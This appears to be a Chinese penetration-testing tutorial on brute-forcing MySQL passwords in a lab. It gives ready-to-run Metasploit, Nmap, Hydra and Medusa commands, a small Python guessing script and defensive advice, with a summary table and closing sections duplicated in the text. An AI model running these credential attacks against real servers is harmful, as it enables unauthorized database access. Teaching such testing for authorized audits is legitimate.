MySQL口令扫描渗透测试完全指南<\/h1>

1. 测试环境准备<\/h2>

1.1 基础环境配置<\/h3>

操作系统<\/strong>: Windows 2003 Server + Kali Linux 2017<\/li>
数据库环境<\/strong>: MySQL 5.0.90-community-nt<\/li>

账号设置<\/strong>:

允许远程访问(host设置为%)<\/li>
测试密码: 11111111<\/li> <\/ul> <\/li> <\/ul>
2. 主流MySQL口令扫描工具详解<\/h2>
2.1 Metasploit框架扫描<\/h3>
2.1.1 基本命令<\/h4>
msfconsole # 启动Metasploit<\/span> <\/span><\/span><\/code><\/pre>2.1.2 密码扫描模块<\/h4> 单一模式扫描<\/strong>:<\/li> <\/ol> use auxiliary\/scanner\/mysql\/mysql_login <\/span><\/span>set rhosts 192.168.157.130 <\/span><\/span>set username root <\/span><\/span>set password 11111111<\/span> <\/span><\/span>run <\/span><\/span><\/code><\/pre> 字典暴力破解<\/strong>:<\/li> <\/ol> use auxiliary\/scanner\/mysql\/mysql_login <\/span><\/span>set RHOSTS 192.168.157.130 <\/span><\/span>set pass_file "\/root\/top10000pwd.txt"<\/span> <\/span><\/span>set username root <\/span><\/span>run <\/span><\/span><\/code><\/pre> 密码验证模块<\/strong>:<\/li> <\/ol> use auxiliary\/admin\/mysql\/mysql_sql <\/span><\/span>set RHOSTS 192.168.157.130 <\/span><\/span>set password 11111111<\/span> <\/span><\/span>set username root <\/span><\/span>run <\/span><\/span><\/code><\/pre>2.1.3 结果解读<\/h4> -<\/code> 表示未成功<\/li> 绿色+<\/code> 表示破解成功，显示用户名和密码<\/li> <\/ul> 2.2 Nmap扫描<\/h3> 2.2.1 MySQL相关脚本<\/h4> ls -al \/usr\/share\/nmap\/scripts\/mysql* <\/span><\/span><\/code><\/pre>包含脚本: mysql-audit.nse, mysql-brute.nse, mysql-databases.nse等<\/p> 2.2.2 常用扫描命令<\/h4> 端口扫描<\/strong>:<\/li> <\/ol> nmap -p 3306<\/span> 192.168.157.130 <\/span><\/span><\/code><\/pre> 空口令扫描<\/strong>:<\/li> <\/ol> nmap -p3306 --script=<\/span>mysql-empty-password.nse 192.168.137.130 <\/span><\/span><\/code><\/pre> 已知口令扫描<\/strong>:<\/li> <\/ol> nmap -sV --script=<\/span>mysql-databases --script-args dbuser=<\/span>root,dbpass=<\/span>11111111<\/span> 192.168.195.130 <\/span><\/span><\/code><\/pre>2.3 Hydra\/xHydra工具<\/h3> 2.3.1 图形界面(xHydra)<\/h4> 设置目标地址和协议<\/li> 配置用户名\/密码或字典文件<\/li> 设置线程数后开始破解<\/li> <\/ol> 2.3.2 命令行模式<\/h4> 单一验证<\/strong>:<\/li> <\/ol> hydra -l root -p11111111 -t 16<\/span> 192.168.157.130 mysql <\/span><\/span><\/code><\/pre> 字典破解<\/strong>:<\/li> <\/ol> hydra -l root -P \/root\/Desktop\/top10000pwd.txt -t 16<\/span> 192.168.157.130 mysql <\/span><\/span><\/code><\/pre> 多目标破解<\/strong>:<\/li> <\/ol> hydra -l root -P \/root\/newpass.txt -t 16<\/span> -M \/root\/ip.txt mysql <\/span><\/span><\/code><\/pre>2.4 Hscan工具<\/h3> 设置扫描参数(startip\/endip)<\/li> 选择"MySQL弱口令检查"模块<\/li> 扫描结果保存在report和log目录<\/li> <\/ol> 2.5 Bruter工具<\/h3> 简单直观的界面<\/li> 支持多种协议<\/li> 适合单个主机快速验证<\/li> <\/ul> 2.6 Medusa(美杜莎)<\/h3> 2.6.1 基本用法<\/h4> medusa [<\/span>-h host|-H file]<\/span> [<\/span>-u username|-U file]<\/span> [<\/span>-p password|-P file]<\/span> [<\/span>-C file]<\/span> -M module [<\/span>OPT]<\/span> <\/span><\/span><\/code><\/pre>2.6.2 MySQL破解示例<\/h4> 单一目标<\/strong>:<\/li> <\/ol> medusa -M mysql -h192.168.17.129 -e ns -F -u root -P \/root\/mypass.txt <\/span><\/span><\/code><\/pre> 多目标<\/strong>:<\/li> <\/ol> medusa -M mysql -H host.txt -e ns -F -u root -P \/root\/mypass.txt <\/span><\/span><\/code><\/pre>2.7 Python脚本<\/h3> 2.7.1 简单爆破脚本<\/h4> import<\/span> MySQLdb <\/span><\/span> <\/span><\/span>mysql_username =<\/span> ('root'<\/span>,'test'<\/span>, 'admin'<\/span>, 'user'<\/span>) <\/span><\/span>common_weak_password =<\/span> (''<\/span>,'123456'<\/span>,'test'<\/span>,'root'<\/span>,'admin'<\/span>,'user'<\/span>) <\/span><\/span>host =<\/span> "127.0.0.1"<\/span> <\/span><\/span>port =<\/span> 3306<\/span> <\/span><\/span> <\/span><\/span>for<\/span> username in<\/span> mysql_username: <\/span><\/span> for<\/span> password in<\/span> common_weak_password: <\/span><\/span> try<\/span>: <\/span><\/span> db =<\/span> MySQLdb.<\/span>connect(host, username, password) <\/span><\/span> print "Success:"<\/span>, username, password <\/span><\/span> except<\/span>: <\/span><\/span> pass<\/span> <\/span><\/span><\/code><\/pre>2.7.2 独自等待版MySQL暴力破解工具<\/h4> mysqlbrute.py www.waitalone.cn 3306<\/span> test user.txt pass.txt <\/span><\/span><\/code><\/pre>3. 工具对比与总结<\/h2> 3.1 推荐工具<\/h3> 综合功能<\/strong>: MSF(破解后可继续渗透)<\/li> 多目标破解<\/strong>: xHydra\/Hydra\/Medusa<\/li> 快速验证<\/strong>: Bruter<\/li> <\/ol> 3.2 常用命令汇总<\/h3> 工具<\/th> 命令示例<\/th> <\/tr> <\/thead> MSF<\/td> use auxiliary\/scanner\/mysql\/mysql_login<\/code><\/td> <\/tr> Hydra<\/td> hydra -l root -P pass.txt -t 16 target mysql<\/code><\/td> <\/tr> Medusa<\/td> medusa -M mysql -h target -u root -P pass.txt<\/code><\/td> <\/tr> Nmap<\/td> nmap -p3306 --script=mysql-brute target<\/code><\/td> <\/tr> <\/tbody> <\/table> 3.3 注意事项<\/h3> 字典过长会导致扫描时间延长<\/li> 破解成功后应停止扫描(-F参数)<\/li> 线程数不宜设置过高<\/li> 合法授权前提下进行测试<\/li> <\/ol> 4. 防御建议<\/h2> 限制数据库远程访问(避免host=%)<\/li> 设置强密码策略<\/li> 限制访问IP<\/li> 定期更换密码<\/li> 监控异常登录尝试<\/li> <\/ol> 通过本指南，您可以全面了解MySQL口令扫描的各种技术方法和工具使用，在实际渗透测试工作中根据具体情况选择合适的方法进行测试。<\/p>

工具<\/th>	命令示例<\/th> <\/tr> <\/thead>
MSF<\/td>	`use auxiliary\/scanner\/mysql\/mysql_login<\/code><\/td> <\/tr>`
Hydra<\/td>	`hydra -l root -P pass.txt -t 16 target mysql<\/code><\/td> <\/tr>`
Medusa<\/td>	`medusa -M mysql -h target -u root -P pass.txt<\/code><\/td> <\/tr>`
Nmap<\/td>	nmap -p3306 --script=mysql-brute target<\/code><\/td> <\/tr> <\/tbody> <\/table> 3.3 注意事项<\/h3> 字典过长会导致扫描时间延长<\/li> 破解成功后应停止扫描(-F参数)<\/li> 线程数不宜设置过高<\/li> 合法授权前提下进行测试<\/li> <\/ol> 4. 防御建议<\/h2> 限制数据库远程访问(避免host=%)<\/li> 设置强密码策略<\/li> 限制访问IP<\/li> 定期更换密码<\/li> 监控异常登录尝试<\/li> <\/ol> 通过本指南，您可以全面了解MySQL口令扫描的各种技术方法和工具使用，在实际渗透测试工作中根据具体情况选择合适的方法进行测试。<\/p>